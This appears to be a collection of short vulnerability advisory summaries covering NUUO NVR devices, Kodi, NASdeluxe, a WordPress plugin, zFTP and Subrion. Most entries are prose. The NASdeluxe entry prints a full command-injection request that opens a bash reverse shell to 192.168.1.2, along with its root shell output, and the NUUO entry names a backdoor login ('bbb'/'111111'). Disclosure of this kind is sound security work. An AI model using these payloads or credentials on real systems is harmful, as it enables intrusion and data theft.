NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script that when called, a backdoor user is created with poweruser privileges that is able to read and write files on the affected device. The backdoor user 'bbb' when created with the password '111111' by visiting 'strong_user.php' script is able to initiate a secure shell session and further steal and/or destroy sensitive information.
Input passed to the 'filename' parameter in 'deletefile.php' is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected POST/GET parameter.
NUUO NVRmini, NVRmini2, Crystal, NVRSolo suffers from authenticated ShellShock vulnerability. This could allow an attacker to gain control over a targeted computer if exploited successfully. The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and Unix.
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from an unauthenticated command injection vulnerability. Due to an undocumented and hidden debugging script, an attacker can inject and execute arbitrary code as the root user via the 'log' GET parameter in the '__debugging_center_utils___.php' script.
A remote Denial Of Service exists in Kodi 16.1 (Jarvis) embedded web server when sending a specially crafted GET request. The web server is disabled by default.
The product "NASdeluxe NDL-2400r" is vulnerable to OS Command Injection as root. No credentials are required to exploit this vulnerability. The language parameter in the web interface login request of the product "NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root. The SySS GmbH sent the following HTTPS request to the webinterface: POST /usr/usrgetform.html?name=index HTTP/1.1 Host: 192.168.1.1 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 97 lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen After sending the request, a reverse shell connected back: # nc -lvvp 443 Listening on any address 443 (https) Connection from 192.168.1.1:49070 bash: no job control in this shell bash-3.00# whoami root bash-3.00# cat /img/version 2.01.09 The tested firmware version was 2.01.09. The most current version is 2.01.10 according to the web page of the vendor [3]. However there are no hints of a security update in the release notes [4]. Thus, the SySS GmbH assumes that this vulnerability is likely also present in the most current firmware version from 2009-10-22.
A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
This exploit is a local buffer overflow vulnerability in zFTP Client. It was developed using Exploit Pack v5.4 by Juan Sacco. The vulnerable code is located in Line 30 of strcpy_chk.c. The affected version is 20061220+dfsg3-4.1. The exploit was tested and developed under Kali Linux 2.0 x86. The Kali Linux 2.0 package is pool/main/c/cernlib/zftp_20061220+dfsg3-4.1_i386.deb with MD5sum 524217187d28e4444d6c437ddd37e4de. The exploit uses a NOPSLED, shellcode and EIP to execute the attack.
A remote sql-injection web vulnerability has been discovered in the Subrion v4.0.5 content management system. The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms. The sql-injection vulnerability is located in the `query` and ` show_query` parameters of the `.database/sql/` module POST method request. Remote attackers are able to execute own sql commands to compromise the application or dbms.
Services By CQR